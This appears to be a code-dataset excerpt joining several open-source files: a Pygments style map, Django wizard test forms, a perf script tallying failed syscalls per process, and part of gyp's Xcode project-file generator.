Name.Variable.Instance: "#000000", # class: 'vi' - to be revised
Number: "#990000", # class: 'm'
Literal: "#000000", # class: 'l'
Literal.Date: "#000000", # class: 'ld'
String: "#4e9a06", # class: 's'
String.Backtick: "#4e9a06", # class: 'sb'
String.Char: "#4e9a06", # class: 'sc'
String.Doc: "italic #8f5902", # class: 'sd' - like a comment
String.Double: "#4e9a06", # class: 's2'
String.Escape: "#4e9a06", # class: 'se'
String.Heredoc: "#4e9a06", # class: 'sh'
String.Interpol: "#4e9a06", # class: 'si'
String.Other: "#4e9a06", # class: 'sx'
String.Regex: "#4e9a06", # class: 'sr'
String.Single: "#4e9a06", # class: 's1'
String.Symbol: "#4e9a06", # class: 'ss'
Generic: "#000000", # class: 'g'
Generic.Deleted: "#a40000", # class: 'gd'
Generic.Emph: "italic #000000", # class: 'ge'
Generic.Error: "#ef2929", # class: 'gr'
Generic.Heading: "bold #000080", # class: 'gh'
Generic.Inserted: "#00A000", # class: 'gi'
Generic.Output: "#888", # class: 'go'
Generic.Prompt: "#745334", # class: 'gp'
Generic.Strong: "bold #000000", # class: 'gs'
Generic.Subheading: "bold #800080", # class: 'gu'
Generic.Traceback: "bold #a40000", # class: 'gt'
}
| agpl-3.0 |
wfxiang08/django178 | django/contrib/formtools/tests/wizard/namedwizardtests/forms.py | 95 | 1760 | import os
import tempfile
from django import forms
from django.core.files.storage import FileSystemStorage
from django.forms.formsets import formset_factory
from django.http import HttpResponse
from django.template import Template, Context
from django.contrib.auth.models import User
from django.contrib.formtools.wizard.views import NamedUrlWizardView
temp_storage_location = tempfile.mkdtemp(dir=os.environ.get('DJANGO_TEST_TEMP_DIR'))
temp_storage = FileSystemStorage(location=temp_storage_location)
class Page1(forms.Form):
name = forms.CharField(max_length=100)
user = forms.ModelChoiceField(queryset=User.objects.all())
thirsty = forms.NullBooleanField()
class Page2(forms.Form):
address1 = forms.CharField(max_length=100)
address2 = forms.CharField(max_length=100)
file1 = forms.FileField()
class Page3(forms.Form):
random_crap = forms.CharField(max_length=100)
Page4 = formset_factory(Page3, extra=2)
class ContactWizard(NamedUrlWizardView):
file_storage = temp_storage
def done(self, form_list, **kwargs):
c = Context({
'form_list': [x.cleaned_data for x in form_list],
'form_dict': kwargs.get('form_dict'),
'all_cleaned_data': self.get_all_cleaned_data()
})
for form in self.form_list.keys():
c[form] = self.get_cleaned_data_for_step(form)
c['this_will_fail'] = self.get_cleaned_data_for_step('this_will_fail')
return HttpResponse(Template('').render(c))
class SessionContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.session.SessionStorage'
class CookieContactWizard(ContactWizard):
storage_name = 'django.contrib.formtools.wizard.storage.cookie.CookieStorage'
| bsd-3-clause |
Evil-Green/Lonas_KL-GT-I9300 | tools/perf/scripts/python/failed-syscalls-by-pid.py | 11180 | 2058 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s syscall-counts-by-pid.py [comm|pid]\n";
for_comm = None
for_pid = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
try:
for_pid = int(sys.argv[1])
except:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
if (for_comm and common_comm != for_comm) or \
(for_pid and common_pid != for_pid ):
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16s\n" % syscall_name(id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20s %10d\n" % (strerror(ret), val),
| gpl-2.0 |
ikona23/driftsuspensions | node_modules/node-gyp/gyp/pylib/gyp/xcodeproj_file.py | 1366 | 120842 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Xcode project file generator.
This module is both an Xcode project file generator and a documentation of the
Xcode project file format. Knowledge of the project file format was gained
based on extensive experience with Xcode, and by making changes to projects in
Xcode.app and observing the resultant changes in the associated project files.
XCODE PROJECT FILES
The generator targets the file format as written by Xcode 3.2 (specifically,
3.2.6), but past experience has taught that the format has not changed
significantly in the past several years, and future versions of Xcode are able
to read older project files.
Xcode project files are "bundled": the project "file" from an end-user's
perspective is actually a directory with an ".xcodeproj" extension. The
project file from this module's perspective is actually a file inside this
directory, always named "project.pbxproj". This file contains a complete
description of the project and is all that is needed to use the xcodeproj.
Other files contained in the xcodeproj directory are simply used to store
per-user settings, such as the state of various UI elements in the Xcode
application.
The project.pbxproj file is a property list, stored in a format almost
identical to the NeXTstep property list format. The file is able to carry
Unicode data, and is encoded in UTF-8. The root element in the property list
is a dictionary that contains several properties of minimal interest, and two
properties of immense interest. The most important property is a dictionary
named "objects". The entire structure of the project is represented by the
children of this property. The objects dictionary is keyed by unique 96-bit
values represented by 24 uppercase hexadecimal characters. Each value in the
objects dictionary is itself a dictionary, describing an individual object.
Each object in the dictionary is a member of a class, which is identified by
the "isa" property of each object. A variety of classes are represented in a
project file. Objects can refer to other objects by ID, using the 24-character
hexadecimal object key. A project's objects form a tree, with a root object
of class PBXProject at the root. As an example, the PBXProject object serves
as parent to an XCConfigurationList object defining the build configurations
used in the project, a PBXGroup object serving as a container for all files
referenced in the project, and a list of target objects, each of which defines
a target in the project. There are several different types of target object,
such as PBXNativeTarget and PBXAggregateTarget. In this module, this
relationship is expressed by having each target type derive from an abstract
base named XCTarget.
The project.pbxproj file's root dictionary also contains a property, sibling to
the "objects" dictionary, named "rootObject". The value of rootObject is a
24-character object key referring to the root PBXProject object in the
objects dictionary.
In Xcode, every file used as input to a target or produced as a final product
of a target must appear somewhere in the hierarchy rooted at the PBXGroup
object referenced by the PBXProject's mainGroup property. A PBXGroup is
generally represented as a folder in the Xcode application. PBXGroups can
contain other PBXGroups as well as PBXFileReferences, which are pointers to
actual files.
Each XCTarget contains a list of build phases, represented in this module by
the abstract base XCBuildPhase. Examples of concrete XCBuildPhase derivations
are PBXSourcesBuildPhase and PBXFrameworksBuildPhase, which correspond to the
"Compile Sources" and "Link Binary With Libraries" phases displayed in the
Xcode application. Files used as input to these phases (for example, source
files in the former case and libraries and frameworks in the latter) are
represented by PBXBuildFile objects, referenced by elements of "files" lists
in XCTarget objects. Each PBXBuildFile object refers to a PBXBuildFile
object as a "weak" reference: it does not "own" the PBXBuildFile, which is
owned by the root object's mainGroup or a descendant group. In most cases, the
layer of indirection between an XCBuildPhase and a PBXFileReference via a
PBXBuildFile appears extraneous, but there's actually one reason for this:
file-specific compiler flags are added to the PBXBuildFile object so as to
allow a single file to be a member of multiple targets while having distinct
compiler flags for each. These flags can be modified in the Xcode applciation
in the "Build" tab of a File Info window.
When a project is open in the Xcode application, Xcode will rewrite it. As
such, this module is careful to adhere to the formatting used by Xcode, to
avoid insignificant changes appearing in the file when it is used in the
Xcode application. This will keep version control repositories happy, and
makes it possible to compare a project file used in Xcode to one generated by
this module to determine if any significant changes were made in the
application.
Xcode has its own way of assigning 24-character identifiers to each object,
which is not duplicated here. Because the identifier only is only generated
once, when an object is created, and is then left unchanged, there is no need
to attempt to duplicate Xcode's behavior in this area. The generator is free
to select any identifier, even at random, to refer to the objects it creates,
and Xcode will retain those identifiers and use them when subsequently
rewriting the project file. However, the generator would choose new random
identifiers each time the project files are generated, leading to difficulties
comparing "used" project files to "pristine" ones produced by this module,
and causing the appearance of changes as every object identifier is changed
when updated projects are checked in to a version control repository. To
mitigate this problem, this module chooses identifiers in a more deterministic
way, by hashing a description of each object as well as its parent and ancestor
objects. This strategy should result in minimal "shift" in IDs as successive
generations of project files are produced.
THIS MODULE
This module introduces several classes, all derived from the XCObject class.
Nearly all of the "brains" are built into the XCObject class, which understands
how to create and modify objects, maintain the proper tree structure, compute
identifiers, and print objects. For the most part, classes derived from
XCObject need only provide a _schema class object, a dictionary that
expresses what properties objects of the class may contain.
Given this structure, it's possible to build a minimal project file by creating
objects of the appropriate types and making the proper connections:
config_list = XCConfigurationList()
group = PBXGroup()
project = PBXProject({'buildConfigurationList': config_list,
'mainGroup': group})
With the project object set up, it can be added to an XCProjectFile object.
XCProjectFile is a pseudo-class in the sense that it is a concrete XCObject
subclass that does not actually correspond to a class type found in a project
file. Rather, it is used to represent the project file's root dictionary.
Printing an XCProjectFile will print the entire project file, including the
full "objects" dictionary.
project_file = XCProjectFile({'rootObject': project})
project_file.ComputeIDs()
project_file.Print()
Xcode project files are always encoded in UTF-8. This module will accept
strings of either the str class or the unicode class. Strings of class str
are assumed to already be encoded in UTF-8. Obviously, if you're just using
ASCII, you won't encounter difficulties because ASCII is a UTF-8 subset.
Strings of class unicode are handled properly and encoded in UTF-8 when
a project file is output.
"""
import gyp.common
import posixpath
import re
import struct
import sys
# hashlib is supplied as of Python 2.5 as the replacement interface for sha
# and other secure hashes. In 2.6, sha is deprecated. Import hashlib if
# available, avoiding a deprecation warning under 2.6. Import sha otherwise,
# preserving 2.4 compatibility.
try:
import hashlib
_new_sha1 = hashlib.sha1
except ImportError:
import sha
_new_sha1 = sha.new
# See XCObject._EncodeString. This pattern is used to determine when a string
# can be printed unquoted. Strings that match this pattern may be printed
# unquoted. Strings that do not match must be quoted and may be further
# transformed to be properly encoded. Note that this expression matches the
# characters listed with "+", for 1 or more occurrences: if a string is empty,
# it must not match this pattern, because it needs to be encoded as "".
_unquoted = re.compile('^[A-Za-z0-9$./_]+$')
# Strings that match this pattern are quoted regardless of what _unquoted says.
# Oddly, Xcode will quote any string with a run of three or more underscores.
_quoted = re.compile('___')
# This pattern should match any character that needs to be escaped by
# XCObject._EncodeString. See that function.
_escaped = re.compile('[\\\\"]|[\x00-\x1f]')
# Used by SourceTreeAndPathFromPath
_path_leading_variable = re.compile(r'^\$\((.*?)\)(/(.*))?$')
def SourceTreeAndPathFromPath(input_path):
"""Given input_path, returns a tuple with sourceTree and path values.
Examples:
input_path (source_tree, output_path)
'$(VAR)/path' ('VAR', 'path')
'$(VAR)' ('VAR', None)
'path' (None, 'path')
"""
source_group_match = _path_leading_variable.match(input_path)
if source_group_match:
source_tree = source_group_match.group(1)
output_path = source_group_match.group(3) # This may be None.
else:
source_tree = None
output_path = input_path
return (source_tree, output_path)
def ConvertVariablesToShellSyntax(input_string):
return re.sub(r'\$\((.*?)\)', '${\\1}', input_string)
class XCObject(object):
"""The abstract base of all class types used in Xcode project files.
Class variables:
_schema: A dictionary defining the properties of this class. The keys to
_schema are string property keys as used in project files. Values
are a list of four or five elements:
[ is_list, property_type, is_strong, is_required, default ]
is_list: True if the property described is a list, as opposed
to a single element.
property_type: The type to use as the value of the property,
or if is_list is True, the type to use for each
element of the value's list. property_type must
be an XCObject subclass, or one of the built-in
types str, int, or dict.
is_strong: If property_type is an XCObject subclass, is_strong
is True to assert that this class "owns," or serves
as parent, to the property value (or, if is_list is
True, values). is_strong must be False if
property_type is not an XCObject subclass.
is_required: True if the property is required for the class.
Note that is_required being True does not preclude
an empty string ("", in the case of property_type
str) or list ([], in the case of is_list True) from
being set for the property.
default: Optional. If is_requried is True, default may be set
to provide a default value for objects that do not supply
their own value. If is_required is True and default
is not provided, users of the class must supply their own
value for the property.
Note that although the values of the array are expressed in
boolean terms, subclasses provide values as integers to conserve
horizontal space.
_should_print_single_line: False in XCObject. Subclasses whose objects
should be written to the project file in the
alternate single-line format, such as
PBXFileReference and PBXBuildFile, should
set this to True.
_encode_transforms: Used by _EncodeString to encode unprintable characters.
The index into this list is the ordinal of the
character to transform; each value is a string
used to represent the character in the output. XCObject
provides an _encode_transforms list suitable for most
XCObject subclasses.
_alternate_encode_transforms: Provided for subclasses that wish to use
the alternate encoding rules. Xcode seems
to use these rules when printing objects in
single-line format. Subclasses that desire
this behavior should set _encode_transforms
to _alternate_encode_transforms.
_hashables: A list of XCObject subclasses that can be hashed by ComputeIDs
to construct this object's ID. Most classes that need custom
hashing behavior should do it by overriding Hashables,
but in some cases an object's parent may wish to push a
hashable value into its child, and it can do so by appending
to _hashables.
Attributes:
id: The object's identifier, a 24-character uppercase hexadecimal string.
Usually, objects being created should not set id until the entire
project file structure is built. At that point, UpdateIDs() should
be called on the root object to assign deterministic values for id to
each object in the tree.
parent: The object's parent. This is set by a parent XCObject when a child
object is added to it.
_properties: The object's property dictionary. An object's properties are
described by its class' _schema variable.
"""
_schema = {}
_should_print_single_line = False
# See _EncodeString.
_encode_transforms = []
i = 0
while i < ord(' '):
_encode_transforms.append('\\U%04x' % i)
i = i + 1
_encode_transforms[7] = '\\a'
_encode_transforms[8] = '\\b'
_encode_transforms[9] = '\\t'
_encode_transforms[10] = '\\n'
_encode_transforms[11] = '\\v'
_encode_transforms[12] = '\\f'
_encode_transforms[13] = '\\n'
_alternate_encode_transforms = list(_encode_transforms)
_alternate_encode_transforms[9] = chr(9)
_alternate_encode_transforms[10] = chr(10)
_alternate_encode_transforms[11] = chr(11)
def __init__(self, properties=None, id=None, parent=None):
self.id = id
self.parent = parent
self._properties = {}
self._hashables = []
self._SetDefaultsFromSchema()
self.UpdateProperties(properties)
def __repr__(self):
try:
name = self.Name()
except NotImplementedError:
return '<%s at 0x%x>' % (self.__class__.__name__, id(self))
return '<%s %r at 0x%x>' % (self.__class__.__name__, name, id(self))
def Copy(self):
"""Make a copy of this object.
The new object will have its own copy of lists and dicts. Any XCObject
objects owned by this object (marked "strong") will be copied in the
new object, even those found in lists. If this object has any weak
references to other XCObjects, the same references are added to the new
object without making a copy.
"""
that = self.__class__(id=self.id, parent=self.parent)
for key, value in self._properties.iteritems():
is_strong = self._schema[key][2]
if isinstance(value, XCObject):
if is_strong:
new_value = value.Copy()
new_value.parent = that
that._properties[key] = new_value
else:
that._properties[key] = value
elif isinstance(value, str) or isinstance(value, unicode) or \
isinstance(value, int):
that._properties[key] = value
elif isinstance(value, list):
if is_strong:
# If is_strong is True, each element is an XCObject, so it's safe to
# call Copy.
that._properties[key] = []
for item in value:
new_item = item.Copy()
new_item.parent = that
that._properties[key].append(new_item)
else:
that._properties[key] = value[:]
elif isinstance(value, dict):
# dicts are never strong.
if is_strong:
raise TypeError('Strong dict for key ' + key + ' in ' + \
self.__class__.__name__)
else:
that._properties[key] = value.copy()
else:
raise TypeError('Unexpected type ' + value.__class__.__name__ + \
' for key ' + key + ' in ' + self.__class__.__name__)
return that
def Name(self):
"""Return the name corresponding to an object.
Not all objects necessarily need to be nameable, and not all that do have
a "name" property. Override as needed.
"""
# If the schema indicates that "name" is required, try to access the
# property even if it doesn't exist. This will result in a KeyError
# being raised for the property that should be present, which seems more
# appropriate than NotImplementedError in this case.
if 'name' in self._properties or \
('name' in self._schema and self._schema['name'][3]):
return self._properties['name']
raise NotImplementedError(self.__class__.__name__ + ' must implement Name')
def Comment(self):
"""Return a comment string for the object.
Most objects just use their name as the comment, but PBXProject uses
different values.
The returned comment is not escaped and does not have any comment marker
strings applied to it.
"""
return self.Name()
def Hashables(self):
hashables = [self.__class__.__name__]
name = self.Name()
if name != None:
hashables.append(name)
hashables.extend(self._hashables)
return hashables
def HashablesForChild(self):
return None
def ComputeIDs(self, recursive=True, overwrite=True, seed_hash=None):
"""Set "id" properties deterministically.
An object's "id" property is set based on a hash of its class type and
name, as well as the class type and name of all ancestor objects. As
such, it is only advisable to call ComputeIDs once an entire project file
tree is built.
If recursive is True, recurse into all descendant objects and update their
hashes.
If overwrite is True, any existing value set in the "id" property will be
replaced.
"""
def _HashUpdate(hash, data):
"""Update hash with data's length and contents.
If the hash were updated only with the value of data, it would be
possible for clowns to induce collisions by manipulating the names of
their objects. By adding the length, it's exceedingly less likely that
ID collisions will be encountered, intentionally or not.
"""
hash.update(struct.pack('>i', len(data)))
hash.update(data)
if seed_hash is None:
seed_hash = _new_sha1()
hash = seed_hash.copy()
hashables = self.Hashables()
assert len(hashables) > 0
for hashable in hashables:
_HashUpdate(hash, hashable)
if recursive:
hashables_for_child = self.HashablesForChild()
if hashables_for_child is None:
child_hash = hash
else:
assert len(hashables_for_child) > 0
child_hash = seed_hash.copy()
for hashable in hashables_for_child:
_HashUpdate(child_hash, hashable)
for child in self.Children():
child.ComputeIDs(recursive, overwrite, child_hash)
if overwrite or self.id is None:
# Xcode IDs are only 96 bits (24 hex characters), but a SHA-1 digest is
# is 160 bits. Instead of throwing out 64 bits of the digest, xor them
# into the portion that gets used.
assert hash.digest_size % 4 == 0
digest_int_count = hash.digest_size / 4
digest_ints = struct.unpack('>' + 'I' * digest_int_count, hash.digest())
id_ints = [0, 0, 0]
for index in xrange(0, digest_int_count):
id_ints[index % 3] ^= digest_ints[index]
self.id = '%08X%08X%08X' % tuple(id_ints)
def EnsureNoIDCollisions(self):
"""Verifies that no two objects have the same ID. Checks all descendants.
"""
ids = {}
descendants = self.Descendants()
for descendant in descendants:
if descendant.id in ids:
other = ids[descendant.id]
raise KeyError(
'Duplicate ID %s, objects "%s" and "%s" in "%s"' % \
(descendant.id, str(descendant._properties),
str(other._properties), self._properties['rootObject'].Name()))
ids[descendant.id] = descendant
def Children(self):
"""Returns a list of all of this object's owned (strong) children."""
children = []
for property, attributes in self._schema.iteritems():
(is_list, property_type, is_strong) = attributes[0:3]
if is_strong and property in self._properties:
if not is_list:
children.append(self._properties[property])
else:
children.extend(self._properties[property])
return children
def Descendants(self):
"""Returns a list of all of this object's descendants, including this
object.
"""
children = self.Children()
descendants = [self]
for child in children:
descendants.extend(child.Descendants())
return descendants
def PBXProjectAncestor(self):
# The base case for recursion is defined at PBXProject.PBXProjectAncestor.
if self.parent:
return self.parent.PBXProjectAncestor()
return None
def _EncodeComment(self, comment):
"""Encodes a comment to be placed in the project file output, mimicing
Xcode behavior.
"""
# This mimics Xcode behavior by wrapping the comment in "/*" and "*/". If
# the string already contains a "*/", it is turned into "(*)/". This keeps
# the file writer from outputting something that would be treated as the
# end of a comment in the middle of something intended to be entirely a
# comment.
return '/* ' + comment.replace('*/', '(*)/') + ' */'
def _EncodeTransform(self, match):
# This function works closely with _EncodeString. It will only be called
# by re.sub with match.group(0) containing a character matched by the
# the _escaped expression.
char = match.group(0)
# Backslashes (\) and quotation marks (") are always replaced with a
# backslash-escaped version of the same. Everything else gets its
# replacement from the class' _encode_transforms array.
if char == '\\':
return '\\\\'
if char == '"':
return '\\"'
return self._encode_transforms[ord(char)]
def _EncodeString(self, value):
"""Encodes a string to be placed in the project file output, mimicing
Xcode behavior.
"""
# Use quotation marks when any character outside of the range A-Z, a-z, 0-9,
# $ (dollar sign), . (period), and _ (underscore) is present. Also use
# quotation marks to represent empty strings.
#
# Escape " (double-quote) and \ (backslash) by preceding them with a
# backslash.
#
# Some characters below the printable ASCII range are encoded specially:
# 7 ^G BEL is encoded as "\a"
# 8 ^H BS is encoded as "\b"
# 11 ^K VT is encoded as "\v"
# 12 ^L NP is encoded as "\f"
# 127 ^? DEL is passed through as-is without escaping
# - In PBXFileReference and PBXBuildFile objects:
# 9 ^I HT is passed through as-is without escaping
# 10 ^J NL is passed through as-is without escaping
# 13 ^M CR is passed through as-is without escaping
# - In other objects:
# 9 ^I HT is encoded as "\t"
# 10 ^J NL is encoded as "\n"
# 13 ^M CR is encoded as "\n" rendering it indistinguishable from
# 10 ^J NL
# All other characters within the ASCII control character range (0 through
# 31 inclusive) are encoded as "\U001f" referring to the Unicode code point
# in hexadecimal. For example, character 14 (^N SO) is encoded as "\U000e".
# Characters above the ASCII range are passed through to the output encoded
# as UTF-8 without any escaping. These mappings are contained in the
# class' _encode_transforms list.
if _unquoted.search(value) and not _quoted.search(value):
return value
return '"' + _escaped.sub(self._EncodeTransform, value) + '"'
def _XCPrint(self, file, tabs, line):
file.write('\t' * tabs + line)
def _XCPrintableValue(self, tabs, value, flatten_list=False):
"""Returns a representation of value that may be printed in a project file,
mimicing Xcode's behavior.
_XCPrintableValue can handle str and int values, XCObjects (which are
made printable by returning their id property), and list and dict objects
composed of any of the above types. When printing a list or dict, and
_should_print_single_line is False, the tabs parameter is used to determine
how much to indent the lines corresponding to the items in the list or
dict.
If flatten_list is True, single-element lists will be transformed into
strings.
"""
printable = ''
comment = None
if self._should_print_single_line:
sep = ' '
element_tabs = ''
end_tabs = ''
else:
sep = '\n'
element_tabs = '\t' * (tabs + 1)
end_tabs = '\t' * tabs
if isinstance(value, XCObject):
printable += value.id
comment = value.Comment()
elif isinstance(value, str):
printable += self._EncodeString(value)
elif isinstance(value, unicode):
printable += self._EncodeString(value.encode('utf-8'))
elif isinstance(value, int):
printable += str(value)
elif isinstance(value, list):
if flatten_list and len(value) <= 1:
if len(value) == 0:
printable += self._EncodeString('')
else:
printable += self._EncodeString(value[0])
else:
printable = '(' + sep
for item in value:
printable += element_tabs + \
self._XCPrintableValue(tabs + 1, item, flatten_list) + \
',' + sep
printable += end_tabs + ')'
elif isinstance(value, dict):
printable = '{' + sep
for item_key, item_value in sorted(value.iteritems()):
printable += element_tabs + \
self._XCPrintableValue(tabs + 1, item_key, flatten_list) + ' = ' + \
self._XCPrintableValue(tabs + 1, item_value, flatten_list) + ';' + \
sep
printable += end_tabs + '}'
else:
raise TypeError("Can't make " + value.__class__.__name__ + ' printable')
if comment != None:
printable += ' ' + self._EncodeComment(comment)
return printable
def _XCKVPrint(self, file, tabs, key, value):
"""Prints a key and value, members of an XCObject's _properties dictionary,
to file.
tabs is an int identifying the indentation level. If the class'
_should_print_single_line variable is True, tabs is ignored and the
key-value pair will be followed by a space insead of a newline.
"""
if self._should_print_single_line:
printable = ''
after_kv = ' '
else:
printable = '\t' * tabs
after_kv = '\n'
# Xcode usually prints remoteGlobalIDString values in PBXContainerItemProxy
# objects without comments. Sometimes it prints them with comments, but
# the majority of the time, it doesn't. To avoid unnecessary changes to
# the project file after Xcode opens it, don't write comments for
# remoteGlobalIDString. This is a sucky hack and it would certainly be
# cleaner to extend the schema to indicate whether or not a comment should
# be printed, but since this is the only case where the problem occurs and
# Xcode itself can't seem to make up its mind, the hack will suffice.
#
# Also see PBXContainerItemProxy._schema['remoteGlobalIDString'].
if key == 'remoteGlobalIDString' and isinstance(self,
PBXContainerItemProxy):
value_to_print = value.id
else:
value_to_print = value
# PBXBuildFile's settings property is represented in the output as a dict,
# but a hack here has it represented as a string. Arrange to strip off the
# quotes so that it shows up in the output as expected.
if key == 'settings' and isinstance(self, PBXBuildFile):
strip_value_quotes = True
else:
strip_value_quotes = False
# In another one-off, let's set flatten_list on buildSettings properties
# of XCBuildConfiguration objects, because that's how Xcode treats them.
if key == 'buildSettings' and isinstance(self, XCBuildConfiguration):
flatten_list = True
else:
flatten_list = False
try:
printable_key = self._XCPrintableValue(tabs, key, flatten_list)
printable_value = self._XCPrintableValue(tabs, value_to_print,
flatten_list)
if strip_value_quotes and len(printable_value) > 1 and \
printable_value[0] == '"' and printable_value[-1] == '"':
printable_value = printable_value[1:-1]
printable += printable_key + ' = ' + printable_value + ';' + after_kv
except TypeError, e:
gyp.common.ExceptionAppend(e,
'while printing key "%s"' % key)
raise
self._XCPrint(file, 0, printable)
def Print(self, file=sys.stdout):
"""Prints a reprentation of this object to file, adhering to Xcode output
formatting.
"""
self.VerifyHasRequiredProperties()
if self._should_print_single_line:
# When printing an object in a single line, Xcode doesn't put any space
# between the beginning of a dictionary (or presumably a list) and the
# first contained item, so you wind up with snippets like
# ...CDEF = {isa = PBXFileReference; fileRef = 0123...
# If it were me, I would have put a space in there after the opening
# curly, but I guess this is just another one of those inconsistencies
# between how Xcode prints PBXFileReference and PBXBuildFile objects as
# compared to other objects. Mimic Xcode's behavior here by using an
# empty string for sep.
sep = ''
end_tabs = 0
else:
sep = '\n'
end_tabs = 2
# Start the object. For example, '\t\tPBXProject = {\n'.
self._XCPrint(file, 2, self._XCPrintableValue(2, self) + ' = {' + sep)
# "isa" isn't in the _properties dictionary, it's an intrinsic property
# of the class which the object belongs to. Xcode always outputs "isa"
# as the first element of an object dictionary.
self._XCKVPrint(file, 3, 'isa', self.__class__.__name__)
# The remaining elements of an object dictionary are sorted alphabetically.
for property, value in sorted(self._properties.iteritems()):
self._XCKVPrint(file, 3, property, value)
# End the object.
self._XCPrint(file, end_tabs, '};\n')
def UpdateProperties(self, properties, do_copy=False):
"""Merge the supplied properties into the _properties dictionary.
The input properties must adhere to the class schema or a KeyError or
TypeError exception will be raised. If adding an object of an XCObject
subclass and the schema indicates a strong relationship, the object's
parent will be set to this object.
If do_copy is True, then lists, dicts, strong-owned XCObjects, and
strong-owned XCObjects in lists will be copied instead of having their
references added.
"""
if properties is None:
return
for property, value in properties.iteritems():
# Make sure the property is in the schema.
if not property in self._schema:
raise KeyError(property + ' not in ' + self.__class__.__name__)
# Make sure the property conforms to the schema.
(is_list, property_type, is_strong) = self._schema[property][0:3]
if is_list:
if value.__class__ != list:
raise TypeError(
property + ' of ' + self.__class__.__name__ + \
' must be list, not ' + value.__class__.__name__)
for item in value:
if not isinstance(item, property_type) and \
not (item.__class__ == unicode and property_type == str):
# Accept unicode where str is specified. str is treated as
# UTF-8-encoded.
raise TypeError(
'item of ' + property + ' of ' + self.__class__.__name__ + \
' must be ' + property_type.__name__ + ', not ' + \
item.__class__.__name__)
elif not isinstance(value, property_type) and \
not (value.__class__ == unicode and property_type == str):
# Accept unicode where str is specified. str is treated as
# UTF-8-encoded.
raise TypeError(
property + ' of ' + self.__class__.__name__ + ' must be ' + \
property_type.__name__ + ', not ' + value.__class__.__name__)
# Checks passed, perform the assignment.
if do_copy:
if isinstance(value, XCObject):
if is_strong:
self._properties[property] = value.Copy()
else:
self._properties[property] = value
elif isinstance(value, str) or isinstance(value, unicode) or \
isinstance(value, int):
self._properties[property] = value
elif isinstance(value, list):
if is_strong:
# If is_strong is True, each element is an XCObject, so it's safe
# to call Copy.
self._properties[property] = []
for item in value:
self._properties[property].append(item.Copy())
else:
self._properties[property] = value[:]
elif isinstance(value, dict):
self._properties[property] = value.copy()
else:
raise TypeError("Don't know how to copy a " + \
value.__class__.__name__ + ' object for ' + \
property + ' in ' + self.__class__.__name__)
else:
self._properties[property] = value
# Set up the child's back-reference to this object. Don't use |value|
# any more because it may not be right if do_copy is true.
if is_strong:
if not is_list:
self._properties[property].parent = self
else:
for item in self._properties[property]:
item.parent = self
def HasProperty(self, key):
return key in self._properties
def GetProperty(self, key):
return self._properties[key]
def SetProperty(self, key, value):
self.UpdateProperties({key: value})
def DelProperty(self, key):
if key in self._properties:
del self._properties[key]
def AppendProperty(self, key, value):
# TODO(mark): Support ExtendProperty too (and make this call that)?
# Schema validation.
if not key in self._schema:
raise KeyError(key + ' not in ' + self.__class__.__name__)
(is_list, property_type, is_strong) = self._schema[key][0:3]
if not is_list:
raise TypeError(key + ' of ' + self.__class__.__name__ + ' must be list')
if not isinstance(value, property_type):
raise TypeError('item of ' + key + ' of ' + self.__class__.__name__ + \
' must be ' + property_type.__name__ + ', not ' + \
value.__class__.__name__)
# If the property doesn't exist yet, create a new empty list to receive the
# item.
if not key in self._properties:
self._properties[key] = []
# Set up the ownership link.
if is_strong:
value.parent = self
# Store the item.
self._properties[key].append(value)
def VerifyHasRequiredProperties(self):
"""Ensure that all properties identified as required by the schema are
set.
"""
# TODO(mark): A stronger verification mechanism is needed. Some
# subclasses need to perform validation beyond what the schema can enforce.
for property, attributes in self._schema.iteritems():
(is_list, property_type, is_strong, is_required) = attributes[0:4]
if is_required and not property in self._properties:
raise KeyError(self.__class__.__name__ + ' requires ' + property)
def _SetDefaultsFromSchema(self):
"""Assign object default values according to the schema. This will not
overwrite properties that have already been set."""
defaults = {}
for property, attributes in self._schema.iteritems():
(is_list, property_type, is_strong, is_required) = attributes[0:4]
if is_required and len(attributes) >= 5 and \
not property in self._properties:
default = attributes[4]
defaults[property] = default
if len(defaults) > 0:
# Use do_copy=True so that each new object gets its own copy of strong
# objects, lists, and dicts.
self.UpdateProperties(defaults, do_copy=True)
class XCHierarchicalElement(XCObject):
"""Abstract base for PBXGroup and PBXFileReference. Not represented in a
project file."""
# TODO(mark): Do name and path belong here? Probably so.
# If path is set and name is not, name may have a default value. Name will
# be set to the basename of path, if the basename of path is different from
# the full value of path. If path is already just a leaf name, name will
# not be set.
_schema = XCObject._schema.copy()
_schema.update({
'comments': [0, str, 0, 0],
'fileEncoding': [0, str, 0, 0],
'includeInIndex': [0, int, 0, 0],
'indentWidth': [0, int, 0, 0],
'lineEnding': [0, int, 0, 0],
'sourceTree': [0, str, 0, 1, '<group>'],
'tabWidth': [0, int, 0, 0],
'usesTabs': [0, int, 0, 0],
'wrapsLines': [0, int, 0, 0],
})
def __init__(self, properties=None, id=None, parent=None):
# super
XCObject.__init__(self, properties, id, parent)
if 'path' in self._properties and not 'name' in self._properties:
path = self._properties['path']
name = posixpath.basename(path)
if name != '' and path != name:
self.SetProperty('name', name)
if 'path' in self._properties and \
